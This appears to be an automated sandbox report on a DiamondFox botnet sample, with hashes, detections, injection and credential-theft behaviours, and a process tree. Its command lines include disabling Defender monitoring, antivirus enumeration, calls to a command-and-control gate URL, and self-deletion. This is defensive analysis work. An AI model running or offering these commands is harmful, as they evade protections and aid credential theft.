Analysis
max time kernel: 136s
max time network: 134s
platform: windows10_x64
resource: win10v20210408
submitted: 04-07-2021 12:03

Static task: static1
Behavioral task behavioral1: sample 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe, resource win7v20210410
Behavioral task behavioral2: sample 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe, resource win10v20210408
General
Target: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Size: 203KB
MD5: a1e165e1926c0c83123c89fce6b1af56
SHA1: 281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512: 28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.

DiamondFox payload (11 IoCs)
Detects DiamondFox payload in file/memory.
Processes (the same row is matched 11 times):
  resource                                                    yara_rule
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe  diamondfox

NirSoft MailPassView (2 IoCs)
Password recovery tool for various email clients
Processes:
  resource                                                                      yara_rule
  behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp                    MailPassView
  behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp  MailPassView

NirSoft WebBrowserPassView (2 IoCs)
Password recovery tool for various web browsers
Processes:
  resource                                                                      yara_rule
  behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp                    WebBrowserPassView
  behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp  WebBrowserPassView

Nirsoft (6 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp                    Nirsoft
  behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp  Nirsoft
  behavioral2/memory/2264-206-0x0000000000413E10-mapping.dmp                    Nirsoft
  behavioral2/memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp  Nirsoft
  behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp                    Nirsoft
  behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp  Nirsoft

Executes dropped EXE (10 IoCs)
Processes:
  pid   process
  4084  MicrosoftEdgeCPS.exe
  2300  MicrosoftEdgeCPS.exe
  592   MicrosoftEdgeCPS.exe
  2264  MicrosoftEdgeCPS.exe
  1524  MicrosoftEdgeCPS.exe
  656   MicrosoftEdgeCPS.exe
  2236  MicrosoftEdgeCPS.exe
  196   MicrosoftEdgeCPS.exe
  3584  MicrosoftEdgeCPS.exe
  1280  MicrosoftEdgeCPS.exe

Deletes itself (1 IoC)
Processes:
  pid   process
  2852  powershell.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext (9 IoCs)
Processes:
  description                          pid   process               target process
  PID 4084 set thread context of 2300  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 592   4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 2264  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 1524  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 656   4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 2236  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 196   4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 3584  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe
  PID 4084 set thread context of 1280  4084  MicrosoftEdgeCPS.exe  MicrosoftEdgeCPS.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3868  1280        WerFault.exe  MicrosoftEdgeCPS.exe

Opens file in notepad (likely ransom note) (1 IoC)
Processes:
  pid   process
  1632  notepad.exe
Suspicious behavior: EnumeratesProcesses (34 IoCs)
Processes (identical repeated rows listed once):
  pid   process
  2852  powershell.exe
  2308  powershell.exe
  4084  MicrosoftEdgeCPS.exe
  2300  MicrosoftEdgeCPS.exe
  2264  MicrosoftEdgeCPS.exe
  1280  MicrosoftEdgeCPS.exe
  3868  WerFault.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (privileges grouped by process, in the order the report lists them):
  wmic.exe (pid 2080), the full sequence appears twice:
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  powershell.exe (pid 2308): SeDebugPrivilege
  powershell.exe (pid 2852): SeDebugPrivilege
  wmic.exe (pid 3180):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (the 64-entry list ends here)

Suspicious use of SetWindowsHookEx (3 IoCs)
Processes:
  pid   process
  592   MicrosoftEdgeCPS.exe
  2236  MicrosoftEdgeCPS.exe
  196   MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (identical repeated rows listed once; the 64-entry list ends at target pid 1524):
  pid   process                                                                 wrote to memory of
  776   2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe   4084 MicrosoftEdgeCPS.exe
  776   2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe   2852 powershell.exe
  4084  MicrosoftEdgeCPS.exe                                                    2308 powershell.exe
  4084  MicrosoftEdgeCPS.exe                                                    2080 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    3180 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    2792 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    1076 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    2272 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    2140 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    2944 wmic.exe
  4084  MicrosoftEdgeCPS.exe                                                    2300 MicrosoftEdgeCPS.exe
  4084  MicrosoftEdgeCPS.exe                                                    592 MicrosoftEdgeCPS.exe
  4084  MicrosoftEdgeCPS.exe                                                    2264 MicrosoftEdgeCPS.exe
  4084  MicrosoftEdgeCPS.exe                                                    1524 MicrosoftEdgeCPS.exe
Processes (tree depth in brackets; the line under each path is its command line)

[1] C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
    "C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" os get caption /FORMAT:List
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_VideoController get caption /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
            - Executes dropped EXE

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE

            [4] C:\Windows\notepad.exe
                X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                - Opens file in notepad (likely ransom note)

            [4] C:\Windows\write.exe
                X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE

        [3] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses

            [4] C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 588
                - Program crash
                - Suspicious behavior: EnumeratesProcesses

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [3] C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
        - Deletes itself
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Downloads (the eleven identical entries for MicrosoftEdgeCPS.exe are listed once)

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5: 1c19c16e21c97ed42d5beabc93391fc5
  SHA1: 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
  SHA256: 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
  SHA512: 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: b2fa30cc11eddf10214bf9962e1eb6a8
  SHA1: 4224949a0aa0547630c33d933a4efc26fbd2ba0a
  SHA256: 1ce826fcc07ce27822102163c3f2b8c6ce480b13ceab14bbd102b06bb3dd7004
  SHA512: 603ad06f1c635a33384c2391cc80777c53a1c768ee7cc357ce5513b957c69082692d056d4be9dc9c5f64455d0818142063d82fc45ca7195a238e9c608a3ed4ee

C:\Users\Admin\AppData\Local\Temp\1.log
  MD5: 4ab56e327e56a995c158a6116430835b
  SHA1: bf39dbae7798cc8bd7d7073998b09652412b111b
  SHA256: 269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e
  SHA512: 37704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (same hashes as the submitted sample)
  MD5: a1e165e1926c0c83123c89fce6b1af56
  SHA1: 281246ba4b852a5f62e032424f7816f5a6b0406f
  SHA256: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
  SHA512: 28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

C:\Users\Admin\AppData\Roaming\EdgeCP\heur.conf
  MD5: 8d420eababb7173b1abb86df8fcbd30c
  SHA1: 11b77c1218bf308d47bb4b89600d3f72af82d525
  SHA256: 1ccfc7778c058e57f64c2e6b985a2c3ea606f0c34b06ac2f4cd2bcf9706d05ba
  SHA512: d863762d88eef79119430f81c77291de5dac47a5465a049843366506caa1fe6dfff96c4179b4ae2f9e919a799e138e3f7f61f77a2adc35eb82a5be1c7892628d

C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
  MD5: d7d2374b845068f4d7239b2d3e7b4f87
  SHA1: 891bbd590ce0ae7647c74f2bb50c52472559bebb
  SHA256: b0aba6eb8b61f27089687eef9b3340d8752fbf6474c542e6ea8d2618c999d0fb
  SHA512: d291ca593bd0706b318ccb27bb6b22c1cfe27ac90ea060e15b6a429141e94131b5bfef5e422acacf6486924042992b7d0ab9576e0aa97e7ba6fee33830401b14

C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
  MD5: 69bf7238c8e32793411515d8ca5926a9
  SHA1: d6918bcceab927a036b760a82cadd340d83b8ed1
  SHA256: 57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
  SHA512: 4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3